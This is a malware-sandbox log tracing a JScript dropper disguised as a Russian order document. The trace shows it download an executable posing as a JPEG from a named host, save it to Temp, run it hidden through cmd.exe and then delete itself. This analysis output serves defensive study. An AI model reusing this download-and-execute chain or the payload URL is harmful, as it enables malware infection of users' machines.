malware/20190808/jailme-output.txt

8 Aug 13:27:11 - mailware-jail, a malware sandbox ver. 0.19
8 Aug 13:27:11 - ------------------------
8 Aug 13:27:11 - Arguments: --down malware/20190808/Информация о заказе.2019-0807.docx.js -s malware/20190808/
8 Aug 13:27:11 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
8 Aug 13:27:11 - Malware files: malware/20190808/Информация о заказе.2019-0807.docx.js
8 Aug 13:27:11 - Execution timeout set to: 60 seconds
8 Aug 13:27:11 - Output file for sandbox dump: sandbox_dump_after.json
8 Aug 13:27:11 - Output directory for generated files: malware/20190808/
8 Aug 13:27:11 - Download from remote server: Yes
8 Aug 13:27:11 - ==> Preparing Sandbox environment.
8 Aug 13:27:11 -  => Executing: env/utils.js quitely
8 Aug 13:27:11 -  => Executing: env/eval.js quitely
8 Aug 13:27:11 -  => Executing: env/function.js quitely
8 Aug 13:27:11 -  => Executing: env/wscript.js quitely
8 Aug 13:27:11 -  => Executing: env/browser.js quitely
8 Aug 13:27:11 -  => Executing: env/agents.js quitely
8 Aug 13:27:11 -  => Executing: env/other.js quitely
8 Aug 13:27:11 -  => Executing: env/console.js quitely
8 Aug 13:27:11 - ==> Executing malware file(s). =========================================
8 Aug 13:27:11 -  => Executing: malware/20190808/Информация о заказе.2019-0807.docx.js verbosely, reporting silent catches
8 Aug 13:27:11 - Saving: malware/20190808/malware_20190808_Информация о заказе.2019-0807.docx.js
8 Aug 13:27:11 - Saving: malware/20190808/tr_malware_20190808_Информация о заказе.2019-0807.docx.js
8 Aug 13:27:11 - WScript.scriptfullname = (string) 'malware/20190808/?????????? ? ??????.2019-0807.docx.js'
8 Aug 13:27:11 - WScript.arguments = (object) 'malware/20190808/?????????? ? ??????.2019-0807.docx.js,xyz'
8 Aug 13:27:11 - ActiveXObject(Scripting.Dictionary)
8 Aug 13:27:11 - new Scripting.Dictionary[14]
8 Aug 13:27:11 - Scripting.Dictionary[14].add(a, b)
8 Aug 13:27:11 - Scripting.Dictionary[14].Exists(a) => true
8 Aug 13:27:11 - ActiveXObject(MSXML2.XMLHTTP)
8 Aug 13:27:11 - new MSXML2.XMLHTTP[15]
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].onreadystatechange = (undefined) 'undefined'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].open(GET,http://innovation.xsrv.jp/1c.jpg,0)
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].method = (string) 'GET'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].url = (string) 'http://innovation.xsrv.jp/1c.jpg'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].async = (boolean) 'false'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].send(undefined)
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].method.get() => (string) 'GET'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].url.get() => (string) 'http://innovation.xsrv.jp/1c.jpg'
8 Aug 13:27:14 - MSXML2.XMLHTTP[15].status = (number) '200'
8 Aug 13:27:14 - MSXML2.XMLHTTP[15].readystate = (number) '4'
8 Aug 13:27:14 - MSXML2.XMLHTTP[15].statustext = (string) 'OK'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].allresponseheaders = (string) '{"server":"nginx","date":"Thu, 08 Aug 2019 13:27:26 GMT","content-type":"image/jpeg","content-length":"1207984","connection":"close","last-modified":"Wed, 03 Jul 2019 05:34:19 GMT","etag":"\"126eb0-58cc036780cc0\"","x-cache-status":"MISS","x-original ... (truncated)'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].status.get() => (number) '200'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].allresponseheaders.get() => (string) '{"server":"nginx","date":"Thu, 08 Aug 2019 13:27:26 GMT","content-type":"image/jpeg","content-length":"1207984","connection":"close","last-modified":"Wed, 03 Jul 2019 05:34:19 GMT","etag":"\"126eb0-58cc036780cc0\"","x-cache-status":"MISS","x-original ... (truncated)'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].statustext.get() => (string) 'OK'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].onreadystatechange.get() => (undefined) 'undefined'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].status.get() => (number) '200'
8 Aug 13:27:15 - ActiveXObject(Scripting.FileSystemObject)
8 Aug 13:27:15 - new Scripting.FileSystemObject[16]
8 Aug 13:27:15 - new DriveObject[17](C:)
8 Aug 13:27:15 - DriveObject[17](C:).name = (string) 'C:'
8 Aug 13:27:15 - new Collection[18]([ DriveObject {?    id: 17,?    _name: 'DriveObject[17](C:)',?    _availablespace: '',?    _driveletter: '',?    _drivetype: '',?    _filesystem: '',?    _freespace: '',?    _isready: '',?    _path: '',?    _rootfolder: '',?    _serialnumber: '',?    ... (truncated))
8 Aug 13:27:15 - Collection[18].count = (number) '1'
8 Aug 13:27:15 - ActiveXObject(ADODB.Stream)
8 Aug 13:27:15 - new ADODB_Stream[19]
8 Aug 13:27:15 - Scripting.FileSystemObject[16].GetSpecialFolder(2) => C:\Users\User\AppData\Local\Temp\
8 Aug 13:27:15 - Scripting.FileSystemObject[16].GetTempName() => TempFile_20.tmp
8 Aug 13:27:15 - ADODB_Stream[19].Open()
8 Aug 13:27:15 - ADODB_Stream[19].type = (number) '1'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ADODB_Stream[19].content = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ADODB_Stream[19].Write(str) - 1207984 bytes
8 Aug 13:27:15 - ADODB_Stream[19].size = (number) '1207984'
8 Aug 13:27:15 - ADODB_Stream[19].position = (number) '0'
8 Aug 13:27:15 - ADODB_Stream[19].Read(undefined)
8 Aug 13:27:15 - ADODB_Stream[19].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ActiveXObject(ADODB.Recordset)
8 Aug 13:27:15 - new ADODB_Recordset[21]
8 Aug 13:27:15 - new Collection[22](undefined)
8 Aug 13:27:15 - Collection[22].count = (number) '0'
8 Aug 13:27:15 - new ADODB_Fields[23]
8 Aug 13:27:15 - ADODB_Recordset[21].fields = (object) 'ADODB_Fields[23]'
8 Aug 13:27:15 - ADODB_Stream[19].size.get() => (number) '1207984'
8 Aug 13:27:15 - ADODB_Recordset[21].fields.get() => (object) 'ADODB_Fields[23]'
8 Aug 13:27:15 - ADODB_Fields[23].Append(bin,201,1207984)
8 Aug 13:27:15 - new ADODB_Field[24]
8 Aug 13:27:15 - ADODB_Field[24].name = (string) 'bin'
8 Aug 13:27:15 - ADODB_Field[24].definedsize = (number) '1207984'
8 Aug 13:27:15 - ADODB_Recordset[21].bin = (object) 'ADODB_Field[24]'
8 Aug 13:27:15 - ADODB_Recordset[21].Open()
8 Aug 13:27:15 - ADODB_Recordset[21].AddNew()
8 Aug 13:27:15 - NU: ADODB_Recordset[21]
8 Aug 13:27:15 - G: bin
8 Aug 13:27:15 - ARD: appendChunk
8 Aug 13:27:15 - Ufk: MZ??????????????????????@????????????????????????? ... (truncated)
8 Aug 13:27:15 - ADODB_Recordset[21].bin.get() => (object) 'ADODB_Field[24]'
8 Aug 13:27:15 - ADODB_Field[24].AppendChunk(MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated))
8 Aug 13:27:15 - ADODB_Recordset[21].Update()
8 Aug 13:27:15 - G: bin
8 Aug 13:27:15 - ADODB_Recordset[21].bin.get() => (object) 'ADODB_Field[24]'
8 Aug 13:27:15 - ADODB_Field[24].value.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ADODB_Stream[19].SaveToFile(C:\Users\User\AppData\Local\Temp\\TempFile_20.tmp, undefined)
8 Aug 13:27:15 - ADODB_Stream[19].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ADODB_Stream[19].Close()
8 Aug 13:27:15 - ActiveXObject(Wscript.Shell)
8 Aug 13:27:15 - new WScript.Shell[25]
8 Aug 13:27:15 - WScript.Shell[25].Run(cmd.exe /c C:\Users\User\AppData\Local\Temp\\TempFile_20.tmp, 0, undefined)
8 Aug 13:27:15 - WScript.scriptfullname.get() => (string) 'malware/20190808/?????????? ? ??????.2019-0807.docx.js'
8 Aug 13:27:15 - Scripting.FileSystemObject[16].DeleteFile(malware/20190808/Информация о заказе.2019-0807.docx.js)
8 Aug 13:27:15 - ==> Cleaning up sandbox.
8 Aug 13:27:15 - ==> Script execution finished, dumping sandbox environment to a file.
8 Aug 13:27:22 - The sandbox context has been  saved to: sandbox_dump_after.json
8 Aug 13:27:22 - Saving: malware/20190808/C__Users_User_AppData_Local_Temp__TempFile_20.tmp
8 Aug 13:27:22 - Saving: malware/20190808/urls.json